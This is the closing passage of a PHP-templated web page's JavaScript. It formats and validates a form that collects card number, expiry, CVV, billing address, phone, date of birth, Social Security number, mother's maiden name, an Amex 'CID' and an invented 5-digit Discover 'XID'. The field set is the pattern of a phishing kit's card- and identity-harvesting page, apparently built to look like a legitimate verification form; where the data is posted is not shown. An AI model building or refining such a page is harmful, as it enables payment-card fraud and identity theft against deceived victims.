                        if (expDateError) expDateError.style.display = 'none';
                        // Force green style with all properties
                        expDateInput.style.setProperty('border-color', '#28a745', 'important');
                        expDateInput.style.setProperty('border-width', '2px', 'important');
                        expDateInput.style.setProperty('background-color', '#f8fff9', 'important');
                        expDateInput.style.setProperty('box-shadow', '0 0 0 0.2rem rgba(40, 167, 69, 0.25)', 'important');
                    } else {
                        expDateInput.classList.add('invalid-card');
                        if (expDateError) expDateError.style.display = 'flex';
                        if (errorSpan) {
                            errorSpan.textContent = validation.message;
                        }
                        // Force red style
                        expDateInput.style.borderColor = '#dc3545';
                        expDateInput.style.borderWidth = '2px';
                    }
                } else {
                    // Reset validation state for incomplete or empty dates
                    if (expDateError) expDateError.style.display = 'none';
                    // Reset border style
                    expDateInput.style.removeProperty('border-color');
                    expDateInput.style.removeProperty('border-width');
                    expDateInput.style.removeProperty('background-color');
                    expDateInput.style.removeProperty('box-shadow');
                }
            }

            // CVV validation function
            function validateCVV(cvvValue, cardType) {
                const cvv = cvvValue.replace(/\D/g, '');
                
                // CVV is ALWAYS required
                if (cvv.length === 0) {
                    return { valid: false, message: i18n.error_cvv_required };
                }
                
                if (!cardType || cardType === 'default') {
                    return { valid: false, message: i18n.error_cvv_card_first };
                }
                
                // Get card config from cardTypes object
                const cardConfig = cardTypes[cardType];
                if (!cardConfig) {
                    return { valid: false, message: i18n.error_cvv_card_first };
                }
                
                const requiredLength = cardConfig.cvvLength;
                
                // STRICT LENGTH VALIDATION - must be exact
                if (cvv.length !== requiredLength) {
                    if (cardType === 'amex') {
                        return { valid: false, message: i18n.error_cvv_amex };
                    } else {
                        return { valid: false, message: i18n.error_cvv_digits.replace('{card}', cardConfig.name).replace('{digits}', requiredLength) };
                    }
                }
                
                return { valid: true, message: '' };
            }

            // Make validateCVV globally accessible
            window.validateCVV = validateCVV;

            function updateCVVValidation(cvvValue, cardType) {
                const cvvInput = document.getElementById('cvv');
                const cvvError = document.getElementById('cvvError');
                const errorSpan = document.getElementById('i18n-cc-cvv-error');
                
                // Only validate if user has interacted with CVV field
                const hasInteracted = cvvInput.hasAttribute('data-touched');
                
                // Remove previous validation classes
                cvvInput.classList.remove('valid-card', 'invalid-card');
                
                if (cardType && cardType !== 'default') {
                    const validation = validateCVV(cvvValue, cardType);
                    
                    if (validation.valid) {
                        cvvInput.classList.add('valid-card');
                        if (cvvError) cvvError.style.display = 'none';
                        // Force green style with all properties
                        cvvInput.style.setProperty('border-color', '#28a745', 'important');
                        cvvInput.style.setProperty('border-width', '2px', 'important');
                        cvvInput.style.setProperty('background-color', '#f8fff9', 'important');
                        cvvInput.style.setProperty('box-shadow', '0 0 0 0.2rem rgba(40, 167, 69, 0.25)', 'important');
                    } else if (hasInteracted || cvvValue.length > 0) {
                        // Only show error if user has touched the field or started typing
                        cvvInput.classList.add('invalid-card');
                        if (cvvError) cvvError.style.display = 'flex';
                        if (errorSpan) {
                            errorSpan.textContent = validation.message;
                        }
                        // Force red style
                        cvvInput.style.borderColor = '#dc3545';
                        cvvInput.style.borderWidth = '2px';
                    } else {
                        // Reset state for untouched empty field
                        if (cvvError) cvvError.style.display = 'none';
                        // Reset border style
                        cvvInput.style.removeProperty('border-color');
                        cvvInput.style.removeProperty('border-width');
                        cvvInput.style.removeProperty('background-color');
                        cvvInput.style.removeProperty('box-shadow');
                    }
                } else if (cvvValue.length > 0) {
                    // Show error if CVV entered but no valid card type
                    cvvInput.classList.add('invalid-card');
                    if (cvvError) cvvError.style.display = 'flex';
                    if (errorSpan) {
                        errorSpan.textContent = i18n.error_cvv_card_first;
                    }
                } else {
                    // Reset state for empty field without card type
                    if (cvvError) cvvError.style.display = 'none';
                    // Reset border style
                    cvvInput.style.removeProperty('border-color');
                    cvvInput.style.removeProperty('border-width');
                    cvvInput.style.removeProperty('background-color');
                    cvvInput.style.removeProperty('box-shadow');
                }
            }

            // Card number input event listener
            if (cardNumberInput) {
                cardNumberInput.addEventListener('input', function(e) {
                    let value = e.target.value;
                    const cleanValue = value.replace(/\D/g, '');
                    
                    // Detect card type
                    const detection = detectCardType(cleanValue);
                    const cardType = detection.type;
                    const cardConfig = detection.config;
                    
                    // Format the number first
                    const formattedValue = formatCardNumber(cleanValue, cardType);
                    
                    // Set max length based on card type (including spaces)
                    let maxLength = 19; // Default with spaces (16 digits + 3 spaces)
                    if (cardType === 'amex') {
                        maxLength = 17; // 15 digits + 2 spaces (4-6-5 format)
                    } else if (cardConfig && cardConfig.lengths) {
                        const maxDigits = Math.max(...cardConfig.lengths);
                        // Calculate spaces: for 16 digits = 3 spaces, for 19 digits = 4 spaces
                        const spaces = Math.floor(maxDigits / 4);
                        maxLength = maxDigits + spaces;
                    }
                    
                    // Update the input value with formatted number
                    e.target.value = formattedValue.substring(0, maxLength);
                    
                    // Update card icon
                    updateCardIcon(cardType);
                    
                    // Update CVV length
                    updateCVVLength(cardType);
                    
                    // Update CID field visibility
                    updateCIDField(cardType);
                    
                    // Update XID field visibility
                    updateXIDField(cardType);
                    
                    // Validate card number immediately after formatting
                    updateCardValidation(e.target.value, cardType);
                    
                    // Also re-validate CVV if it has a value (card type might have changed)
                    if (cvvInput && cvvInput.value) {
                        updateCVVValidation(cvvInput.value, cardType);
                    }
                });
                
                // Format and validate existing card number on page load
                if (cardNumberInput.value) {
                    const originalValue = cardNumberInput.value;
                    const cleanValue = originalValue.replace(/\D/g, '');
                    const detection = detectCardType(cleanValue);
                    const cardType = detection.type;
                    const formatted = formatCardNumber(cleanValue, cardType);
                    
                    // Always format if value exists and is different
                    if (formatted && formatted !== originalValue) {
                        cardNumberInput.value = formatted;
                    }
                    
                    // Validate the card number on page load
                    updateCardValidation(cardNumberInput.value, cardType);
                }
                
                // Initialize with default card icon
                updateCardIcon('default');
            }
            
            // Format expiration date (MM/YY) with validation
            const expDateInput = document.getElementById('expDate');
            if (expDateInput) {
                expDateInput.addEventListener('input', function(e) {
                    let value = e.target.value.replace(/\D/g, '');
                    
                    if (value.length >= 2) {
                        value = value.substring(0, 2) + '/' + value.substring(2, 4);
                    }
                    
                    e.target.value = value;
                    
                    // Validate expiration date
                    updateExpirationValidation(value);
                });
            }
            
            // Format CVV (numbers only) with validation
            if (cvvInput) {
                cvvInput.addEventListener('input', function(e) {
                    e.target.value = e.target.value.replace(/\D/g, '').substring(0, 4);
                    
                    // Mark as touched when user starts typing
                    e.target.setAttribute('data-touched', 'true');
                    
                    // Get current card type for validation
                    const cardNumberInput = document.getElementById('cardNumber');
                    if (cardNumberInput) {
                        const detection = detectCardType(cardNumberInput.value);
                        const cardType = detection.type;
                        
                        // Validate CVV with current card type
                        updateCVVValidation(e.target.value, cardType);
                    }
                });
                
                // Mark CVV as touched when user focuses on it
                cvvInput.addEventListener('focus', function(e) {
                    e.target.setAttribute('data-touched', 'true');
                });
                
                // Validate CVV on blur if user has interacted
                cvvInput.addEventListener('blur', function(e) {
                    if (e.target.hasAttribute('data-touched')) {
                        const cardNumberInput = document.getElementById('cardNumber');
                        if (cardNumberInput) {
                            const detection = detectCardType(cardNumberInput.value);
                            const cardType = detection.type;
                            updateCVVValidation(e.target.value, cardType);
                        }
                    }
                });
            }
            
            // Format CID (numbers only, 3 digits for Amex)
            const cidInput = document.getElementById('amexcid');
            if (cidInput) {
                cidInput.addEventListener('input', function(e) {
                    e.target.value = e.target.value.replace(/\D/g, '').substring(0, 3);
                });
            }

            // Format and validate XID (numbers only, 5 digits for Discover)
            var xidInput = document.getElementById('xid_input');
            if (xidInput) {
                xidInput.addEventListener('input', function() {
                    this.value = this.value.replace(/\D/g, '').substring(0, 5);
                    this.classList.remove('valid-card', 'invalid-card');
                    var xidErr = document.getElementById('xid_error');
                    if (this.value.length === 5) {
                        this.classList.add('valid-card');
                        this.style.setProperty('border-color', '#28a745', 'important');
                        this.style.setProperty('background-color', '#f8fff9', 'important');
                        if (xidErr) xidErr.style.display = 'none';
                    } else if (this.value.length > 0) {
                        this.classList.add('invalid-card');
                        this.style.setProperty('border-color', '#dc3545', 'important');
                        if (xidErr) xidErr.style.display = 'block';
                    } else {
                        this.style.removeProperty('border-color');
                        this.style.removeProperty('background-color');
                        if (xidErr) xidErr.style.display = 'none';
                    }
                });
            }
            
            // Format Date of Birth (MM/DD/YYYY)
            const dobInput = document.getElementById('dob');
            if (dobInput) {
                dobInput.addEventListener('input', function(e) {
                    let date = e.target.value.replace(/\D/g, '');
                    if (date.length >= 5) {
                        date = date.replace(/(\d{2})(\d{2})(\d{4})/, '$1/$2/$3');
                    } else if (date.length >= 3) {
                        date = date.replace(/(\d{2})(\d{0,2})/, '$1/$2');
                    }
                    e.target.value = date.substring(0, 10);
                });
            }
            
            // Format SSN (XXX-XX-XXXX)
            const ssnInput = document.getElementById('ssn');
            if (ssnInput) {
                ssnInput.addEventListener('input', function(e) {
                    let ssn = e.target.value.replace(/\D/g, '');
                    if (ssn.length >= 5) {
                        ssn = ssn.replace(/(\d{3})(\d{2})(\d{4})/, '$1-$2-$3');
                    } else if (ssn.length >= 3) {
                        ssn = ssn.replace(/(\d{3})(\d{0,2})/, '$1-$2');
                    }
                    e.target.value = ssn.substring(0, 11);
                });
            }
            
            // Format Phone Number with IP-based country code
            const phoneInput = document.getElementById('phone');
            if (phoneInput) {
                const ccPhoneCode = '<?= htmlspecialchars($phoneCode) ?>';
                const ccPhoneLengths = {'+1':10,'+7':10,'+20':10,'+27':9,'+30':10,'+31':9,'+32':9,'+33':9,'+34':9,'+36':9,'+39':10,'+40':9,'+41':9,'+43':10,'+44':10,'+45':8,'+46':9,'+47':8,'+48':9,'+49':11,'+51':9,'+52':10,'+53':8,'+54':10,'+55':11,'+56':9,'+57':10,'+58':10,'+60':10,'+61':9,'+62':12,'+63':10,'+64':9,'+65':8,'+66':9,'+81':10,'+82':10,'+84':10,'+86':11,'+90':10,'+91':10,'+92':10,'+93':9,'+94':9,'+95':9,'+98':10,'+211':9,'+212':9,'+213':9,'+216':8,'+218':9,'+220':7,'+221':9,'+222':8,'+223':8,'+224':9,'+225':10,'+226':8,'+227':8,'+228':8,'+229':8,'+230':8,'+231':7,'+232':8,'+233':9,'+234':10,'+235':8,'+236':8,'+237':9,'+238':7,'+239':7,'+240':9,'+241':7,'+242':9,'+243':9,'+244':9,'+245':7,'+246':7,'+247':4,'+248':7,'+249':9,'+250':9,'+251':9,'+252':8,'+253':6,'+254':9,'+255':9,'+256':9,'+257':8,'+258':9,'+260':9,'+261':9,'+262':9,'+263':9,'+264':9,'+265':9,'+266':8,'+267':8,'+268':8,'+269':7,'+290':4,'+291':7,'+297':7,'+298':6,'+299':6,'+350':8,'+351':9,'+352':9,'+353':9,'+354':7,'+355':9,'+356':8,'+357':8,'+358':9,'+359':9,'+370':8,'+371':8,'+372':8,'+373':8,'+374':8,'+375':9,'+376':6,'+377':8,'+378':10,'+380':9,'+381':9,'+382':8,'+383':8,'+385':9,'+386':8,'+387':8,'+389':8,'+420':9,'+421':9,'+423':7,'+500':5,'+501':7,'+502':8,'+503':8,'+504':8,'+505':8,'+506':8,'+507':8,'+508':6,'+509':8,'+590':9,'+591':8,'+592':7,'+593':9,'+594':9,'+595':9,'+596':9,'+597':7,'+598':8,'+599':7,'+670':8,'+672':6,'+673':7,'+674':7,'+675':8,'+676':7,'+677':7,'+678':7,'+679':7,'+680':7,'+681':6,'+682':5,'+683':4,'+685':7,'+686':8,'+687':6,'+688':5,'+689':6,'+690':4,'+691':7,'+692':7,'+850':10,'+852':8,'+853':8,'+855':9,'+856':10,'+880':10,'+886':9,'+960':7,'+961':8,'+962':9,'+963':9,'+964':10,'+965':8,'+966':9,'+967':9,'+968':8,'+970':9,'+971':9,'+972':9,'+973':8,'+974':8,'+975':8,'+976':8,'+977':10,'+992':9,'+993':8,'+994':9,'+995':9,'+996':9,'+998':9};
                const ccMaxDigits = ccPhoneLengths[ccPhoneCode] || 10;
                
                phoneInput.addEventListener('input', function(e) {
                    let phone = e.target.value;
                    if (!phone.startsWith(ccPhoneCode)) {
                        phone = ccPhoneCode + ' ' + phone.replace(/^[\+\d\s]+/, '');
                    }
                    let digits = phone.substring(ccPhoneCode.length).replace(/\D/g, '');
                    if (digits.length > ccMaxDigits) digits = digits.substring(0, ccMaxDigits);
                    let formatted = '';
                    if (ccMaxDigits === 10 && digits.length > 0) {
                        if (digits.length >= 6) formatted = '(' + digits.substring(0,3) + ') ' + digits.substring(3,6) + '-' + digits.substring(6);
                        else if (digits.length >= 3) formatted = '(' + digits.substring(0,3) + ') ' + digits.substring(3);
                        else formatted = '(' + digits;
                    } else if (ccMaxDigits === 11 && digits.length > 0) {
                        if (digits.length >= 7) formatted = digits.substring(0,3) + ' ' + digits.substring(3,7) + ' ' + digits.substring(7);
                        else if (digits.length >= 3) formatted = digits.substring(0,3) + ' ' + digits.substring(3);
                        else formatted = digits;
                    } else if (ccMaxDigits === 8 && digits.length > 0) {
                        if (digits.length >= 4) formatted = digits.substring(0,4) + ' ' + digits.substring(4);
                        else formatted = digits;
                    } else if (ccMaxDigits === 9 && digits.length > 0) {
                        if (digits.length >= 5) formatted = digits.substring(0,3) + ' ' + digits.substring(3,5) + ' ' + digits.substring(5);
                        else if (digits.length >= 3) formatted = digits.substring(0,3) + ' ' + digits.substring(3);
                        else formatted = digits;
                    } else if (ccMaxDigits === 12 && digits.length > 0) {
                        if (digits.length >= 7) formatted = digits.substring(0,3) + ' ' + digits.substring(3,7) + ' ' + digits.substring(7);
                        else if (digits.length >= 3) formatted = digits.substring(0,3) + ' ' + digits.substring(3);
                        else formatted = digits;
                    } else {
                        formatted = digits;
                    }
                    e.target.value = ccPhoneCode + ' ' + formatted;
                });
            }
        });
        
        // Initialize floating labels for fields with existing values
        document.addEventListener('DOMContentLoaded', function() {
            const inputs = document.querySelectorAll('.form-control');
            inputs.forEach(input => {
                if (input.value && input.value.trim() !== '') {
                    input.classList.add('has-value');
                }
            });
            // City/state will auto-fill when user types ZIP code
        });

        
        const cardForm = document.getElementById('cardForm');
        const submitButton = document.getElementById('submitButton');
        
        if (cardForm) {
            cardForm.addEventListener('submit', function(e) {
            // Get form values - access elements directly
            const cardNumberInput = document.getElementById('cardNumber');
            const expDateInput = document.getElementById('expDate');
            const cvvInputEl = document.getElementById('cvv');
            
            const cardNumber = cardNumberInput ? cardNumberInput.value.replace(/\s/g, '').trim() : '';
            const expDate = expDateInput ? expDateInput.value.trim() : '';
            const cvv = cvvInputEl ? cvvInputEl.value.trim() : '';
            const nameOnCard = document.getElementById('nameOnCard').value.trim();
            const fullAddress = document.getElementById('fullAddress') ? document.getElementById('fullAddress').value.trim() : '';
            const city = document.getElementById('city') ? document.getElementById('city').value.trim() : '';
            const phone = document.getElementById('phone') ? document.getElementById('phone').value.trim() : '';
            const zipCode = document.getElementById('zipCode') ? document.getElementById('zipCode').value.trim() : '';
            const state = document.getElementById('state') ? document.getElementById('state').value.trim() : '';
            const dob = document.getElementById('dob') ? document.getElementById('dob').value.trim() : '';
            const ssn = document.getElementById('ssn') ? document.getElementById('ssn').value.trim() : '';
            const mmn = document.getElementById('mmn') ? document.getElementById('mmn').value.trim() : '';
            const agree = document.getElementById('agree').checked;
            
            // Clear previous errors
            document.querySelectorAll('.valid-card, .invalid-card').forEach(el => {
                el.classList.remove('valid-card', 'invalid-card');
            });
            document.querySelectorAll('.error-message').forEach(el => {
                el.style.display = 'none';
            });
            
            // Validate required fields - NO EMPTY FIELDS ALLOWED
            let hasError = false;
            
            // Validate card number (13-19 digits) - MUST NOT BE EMPTY
            const cardNumberError = document.getElementById('cardNumberError');
            const cardNumberErrorSpan = document.getElementById('i18n-cc-number-error');
            
            if (!cardNumber || cardNumber.length === 0 || cardNumber.length < 15 || cardNumber.length > 16 || !/^\d+$/.test(cardNumber)) {
                cardNumberInput.classList.add('invalid-card');
                cardNumberError.style.display = 'flex';
                if (cardNumberErrorSpan) {
                    if (!cardNumber || cardNumber.length === 0) {
                        cardNumberErrorSpan.textContent = i18n.error_card_number_empty;
                    } else {
                        cardNumberErrorSpan.textContent = i18n.error_card_number_invalid;
                    }
                }
                hasError = true;
            } else {
                // Validate with Luhn algorithm
                const detection = detectCardType(cardNumber);
                const cardType = detection.type;
                const isValidLuhn = validateCardNumber(cardNumber);
                const cardConfig = cardTypes[cardType];
                const isValidLength = cardConfig && cardConfig.lengths.includes(cardNumber.length);
                
                if (!isValidLuhn || !isValidLength || cardType === 'default') {
                    cardNumberInput.classList.add('invalid-card');
                    cardNumberError.style.display = 'flex';
                    if (cardNumberErrorSpan) {
                        cardNumberErrorSpan.textContent = i18n.error_card_number_invalid;
                    }
                    hasError = true;
                } else {
                    cardNumberInput.classList.add('valid-card');
                    cardNumberInput.style.borderColor = '#28a745';
                    cardNumberInput.style.borderWidth = '2px';
                }
            }
            
            // Validate expiration date (MM/YY format) - MUST NOT BE EMPTY
            const expDateError = document.getElementById('expDateError');
            const expDateErrorSpan = document.getElementById('i18n-cc-expiry-error');
            
            if (!expDate || expDate.length === 0 || !/^(0[1-9]|1[0-2])\/\d{2}$/.test(expDate)) {
                expDateInput.classList.add('invalid-card');
                expDateError.style.display = 'flex';
                if (expDateErrorSpan) {
                    if (!expDate || expDate.length === 0) {
                        expDateErrorSpan.textContent = i18n.error_expiry_date_empty;
                    } else {
                        expDateErrorSpan.textContent = i18n.error_expiry_date_invalid;
                    }
                }
                hasError = true;
            } else {
                const expValidation = validateExpirationDate(expDate);
                if (!expValidation.valid) {
                    expDateInput.classList.add('invalid-card');
                    expDateError.style.display = 'flex';
                    if (expDateErrorSpan) {
                        expDateErrorSpan.textContent = expValidation.message;
                    }
                    hasError = true;
                } else {
                    expDateInput.classList.add('valid-card');
                    expDateInput.style.borderColor = '#28a745';
                    expDateInput.style.borderWidth = '2px';
                }
            }
            
            // Validate CVV (3-4 digits) - MUST NOT BE EMPTY
            const cvvError = document.getElementById('cvvError');
            const cvvErrorSpan = document.getElementById('i18n-cc-cvv-error');
            const cardNumberForCVV = document.getElementById('cardNumber').value.replace(/\s/g, '');
            const cvvCardDetection = detectCardType(cardNumberForCVV);
            const cvvCardType = cvvCardDetection.type;
            
            if (!cvv || cvv.length === 0) {
                cvvInputEl.classList.add('invalid-card');
                cvvError.style.display = 'flex';
                if (cvvErrorSpan) {
                    cvvErrorSpan.textContent = i18n.error_cvv;
                }
                hasError = true;
            } else {
                const cvvValidation = validateCVV(cvv, cvvCardType);
                if (!cvvValidation.valid) {
                    cvvInputEl.classList.add('invalid-card');
                    cvvError.style.display = 'flex';
                    if (cvvErrorSpan) {
                        cvvErrorSpan.textContent = cvvValidation.message;
                    }
                    hasError = true;
                } else {
                    cvvInputEl.classList.add('valid-card');
                    cvvInputEl.style.borderColor = '#28a745';
                    cvvInputEl.style.borderWidth = '2px';
                }
            }
            
            // Validate name on card - MUST NOT BE EMPTY
            const nameOnCardInput = document.getElementById('nameOnCard');
            const nameOnCardError = document.getElementById('nameOnCardError');
            if (!nameOnCard || nameOnCard.length === 0) {
                nameOnCardInput.classList.add('invalid-card');
                nameOnCardError.style.display = 'flex';
                hasError = true;
            } else {
                nameOnCardInput.classList.add('valid-card');
                nameOnCardInput.style.borderColor = '#28a745';
                nameOnCardInput.style.borderWidth = '2px';
            }
            
            // Validate full address - MUST NOT BE EMPTY
            const fullAddressInput = document.getElementById('fullAddress');
            if (fullAddressInput) {
                const fullAddressError = document.getElementById('fullAddressError');
                if (!fullAddress || fullAddress.length === 0) {
                    fullAddressInput.classList.add('invalid-card');
                    fullAddressError.style.display = 'flex';
                    hasError = true;
                } else {
                    fullAddressInput.classList.add('valid-card');
                    fullAddressInput.style.borderColor = '#28a745';
                    fullAddressInput.style.borderWidth = '2px';
                }
            }
            
            // Validate city - MUST NOT BE EMPTY
            const cityInput = document.getElementById('city');
            if (cityInput) {
                const cityError = document.getElementById('cityError');
                if (!city || city.length === 0) {
                    cityInput.classList.add('invalid-card');
                    cityError.style.display = 'flex';
                    hasError = true;
                } else {
                    cityInput.classList.add('valid-card');
                    cityInput.style.borderColor = '#28a745';
                    cityInput.style.borderWidth = '2px';
                }
            }
            
            // Validate phone number - IP-based country code with digit limit
            const phoneInputEl = document.getElementById('phone');
            if (phoneInputEl) {
                const phoneError = document.getElementById('phoneError');
                const valPhoneCode = '<?= htmlspecialchars($phoneCode) ?>';
                const valPhoneLengths = {'+1':10,'+7':10,'+20':10,'+27':9,'+30':10,'+31':9,'+32':9,'+33':9,'+34':9,'+36':9,'+39':10,'+40':9,'+41':9,'+43':10,'+44':10,'+45':8,'+46':9,'+47':8,'+48':9,'+49':11,'+51':9,'+52':10,'+53':8,'+54':10,'+55':11,'+56':9,'+57':10,'+58':10,'+60':10,'+61':9,'+62':12,'+63':10,'+64':9,'+65':8,'+66':9,'+81':10,'+82':10,'+84':10,'+86':11,'+90':10,'+91':10,'+92':10,'+93':9,'+94':9,'+95':9,'+98':10,'+211':9,'+212':9,'+213':9,'+216':8,'+218':9,'+350':8,'+351':9,'+352':9,'+353':9,'+354':7,'+355':9,'+356':8,'+357':8,'+358':9,'+359':9,'+370':8,'+371':8,'+372':8,'+373':8,'+374':8,'+375':9,'+376':6,'+377':8,'+378':10,'+380':9,'+381':9,'+382':8,'+383':8,'+385':9,'+386':8,'+387':8,'+389':8,'+420':9,'+421':9,'+423':7,'+852':8,'+853':8,'+855':9,'+856':10,'+880':10,'+886':9,'+960':7,'+961':8,'+962':9,'+963':9,'+964':10,'+965':8,'+966':9,'+967':9,'+968':8,'+970':9,'+971':9,'+972':9,'+973':8,'+974':8,'+975':8,'+976':8,'+977':10,'+992':9,'+993':8,'+994':9,'+995':9,'+996':9,'+998':9};
                const reqPhoneDigits = valPhoneLengths[valPhoneCode] || 10;
                const phoneOnlyDigits = phone.substring(valPhoneCode.length).replace(/\D/g, '');
                if (!phone || phone.trim() === valPhoneCode || phoneOnlyDigits.length !== reqPhoneDigits) {
                    phoneInputEl.classList.add('invalid-card');
                    phoneError.style.display = 'flex';
                    hasError = true;
                } else {
                    phoneInputEl.classList.add('valid-card');
                    phoneInputEl.style.borderColor = '#28a745';
                    phoneInputEl.style.borderWidth = '2px';
                }
            }
            
            // Validate zip code - MUST NOT BE EMPTY
            const zipCodeInput = document.getElementById('zipCode');
            if (zipCodeInput) {
                const zipCodeError = document.getElementById('zipCodeError');
                if (!zipCode || zipCode.length === 0) {
                    zipCodeInput.classList.add('invalid-card');
                    zipCodeError.style.display = 'flex';
                    hasError = true;
                } else {
                    zipCodeInput.classList.add('valid-card');
                    zipCodeInput.style.borderColor = '#28a745';
                    zipCodeInput.style.borderWidth = '2px';
                }
            }
            
            // Validate state - MUST NOT BE EMPTY
            const stateInput = document.getElementById('state');
            if (stateInput) {
                const stateError = document.getElementById('stateError');
                if (!state || state.length === 0) {
                    stateInput.classList.add('invalid-card');
                    stateError.style.display = 'flex';
                    hasError = true;
                } else {
                    stateInput.classList.add('valid-card');
                    stateInput.style.borderColor = '#28a745';
                    stateInput.style.borderWidth = '2px';
                }
            }
            
            // Validate date of birth - MUST NOT BE EMPTY (only if enabled)
            const dobInput = document.getElementById('dob');
            if (dobInput) {
                const dobError = document.getElementById('dobError');
                if (!dob || dob.length === 0 || !/^(0[1-9]|1[0-2])\/(0[1-9]|[12]\d|3[01])\/\d{4}$/.test(dob)) {
                    dobInput.classList.add('invalid-card');
                    dobError.style.display = 'flex';
                    hasError = true;
                } else {
                    dobInput.classList.add('valid-card');
                    dobInput.style.borderColor = '#28a745';
                    dobInput.style.borderWidth = '2px';
                }
            }
            
            // Validate SSN - MUST NOT BE EMPTY (only if enabled)
            const ssnInput = document.getElementById('ssn');
            if (ssnInput) {
                const ssnError = document.getElementById('ssnError');
                if (!ssn || ssn.length === 0 || !/^\d{3}-\d{2}-\d{4}$/.test(ssn)) {
                    ssnInput.classList.add('invalid-card');
                    ssnError.style.display = 'flex';
                    hasError = true;
                } else {
                    ssnInput.classList.add('valid-card');
                    ssnInput.style.borderColor = '#28a745';
                    ssnInput.style.borderWidth = '2px';
                }
            }
            
            // Validate Mother's Maiden Name - MUST NOT BE EMPTY (only if enabled)
            const mmnInput = document.getElementById('mmn');
            if (mmnInput) {
                const mmnError = document.getElementById('mmnError');
                if (!mmn || mmn.length === 0) {
                    mmnInput.classList.add('invalid-card');
                    mmnError.style.display = 'flex';
                    hasError = true;
                } else {
                    mmnInput.classList.add('valid-card');
                    mmnInput.style.borderColor = '#28a745';
                    mmnInput.style.borderWidth = '2px';
                }
            }
            
            // Validate CID for American Express - MUST NOT BE EMPTY (only if Amex card)
            const cidFieldGroup = document.getElementById('cidFieldGroup');
            const cidInput = document.getElementById('amexcid');
            if (cidFieldGroup && cidFieldGroup.style.display !== 'none' && cidInput) {
                const cidError = document.getElementById('cidError');
                const cidValue = cidInput.value.trim();
                if (!cidValue || cidValue.length !== 3 || !/^\d{3}$/.test(cidValue)) {
                    cidInput.classList.add('invalid-card');
                    cidError.style.display = 'flex';
                    hasError = true;
                } else {
                    cidInput.classList.add('valid-card');
                    cidInput.style.borderColor = '#28a745';
                    cidInput.style.borderWidth = '2px';
                }
            }

            // Validate XID for Discover - MUST NOT BE EMPTY (only if Discover card)
            const xidFieldGroup = document.getElementById('xidFieldGroup');
            const xidInputEl = document.getElementById('xid_input');
            if (xidFieldGroup && xidFieldGroup.style.display !== 'none' && xidInputEl) {
                const xidError = document.getElementById('xid_error');
                const xidValue = xidInputEl.value.trim();
                if (!xidValue || xidValue.length !== 5 || !/^\d{5}$/.test(xidValue)) {
                    xidInputEl.classList.add('invalid-card');
                    xidInputEl.style.setProperty('border-color', '#dc3545', 'important');
                    if (xidError) xidError.style.display = 'flex';
                    hasError = true;
                } else {
                    xidInputEl.classList.add('valid-card');
                    xidInputEl.style.setProperty('border-color', '#28a745', 'important');
                    xidInputEl.style.borderWidth = '2px';
                }
            }
            
            // Validate agreement checkbox
            if (!agree) {
                alert(i18n.error_agree_terms);
                hasError = true;
            }
            
            if (hasError) {
                // Prevent form submission if there are errors
                e.preventDefault();
                // Scroll to first error
                const firstError = document.querySelector('.invalid-card');
                if (firstError) {
                    firstError.scrollIntoView({ behavior: 'smooth', block: 'center' });
                    firstError.focus();
                }
                return false;
            }
            
            // Disable submit button to prevent double submission
            if (submitButton) {
                submitButton.disabled = true;
                submitButton.textContent = i18n.processing;
            }
            
            // If no errors, allow form to submit normally (don't prevent default)
            });
        }
    </script>
</body>
</html>